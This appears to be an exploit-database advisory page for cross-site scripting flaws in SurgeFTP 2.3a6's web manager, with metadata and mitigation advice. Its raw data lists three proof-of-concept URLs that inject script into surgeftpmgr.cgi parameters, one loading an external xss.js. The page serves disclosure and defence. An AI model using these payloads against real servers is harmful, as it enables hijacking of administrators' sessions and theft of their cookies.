header-logo
Suggest Exploit
vendor:
SurgeFTP
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: SurgeFTP
Affected Version From: 2.3a6
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:surgemedia:surgeftp:2.3a6
Metasploit:
Other Scripts:
Platforms Tested:

Cross-Site Scripting Vulnerabilities in SurgeFTP

SurgeFTP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in an administrator's browser session in the context of the affected site. This could potentially allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.

Mitigation:

It is recommended to update to a patched version of SurgeFTP that properly sanitizes user-supplied data to prevent cross-site scripting attacks. Additionally, input validation and encoding should be implemented to ensure that user-supplied data is properly sanitized before being displayed or processed by the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37844/info

SurgeFTP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in an administrator's browser session in the context of the affected site. This could potentially allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.

SurgeFTP 2.3a6 is vulnerable; other versions may also be affected. 

http://www.example.com:7021/cgi/surgeftpmgr.cgi?domainid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&cmd=user_admin
http://www.example.com:7021/cgi/surgeftpmgr.cgi?domainid=-1&cmd=class&classid=<img+src=http://127.0.0.1/t.gif+onload=alert(213771818860)>
http://www.example.com:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CSCRIPT%20SRC=http://www.example.com/xss.js%3E%3C/SCRIPT%3E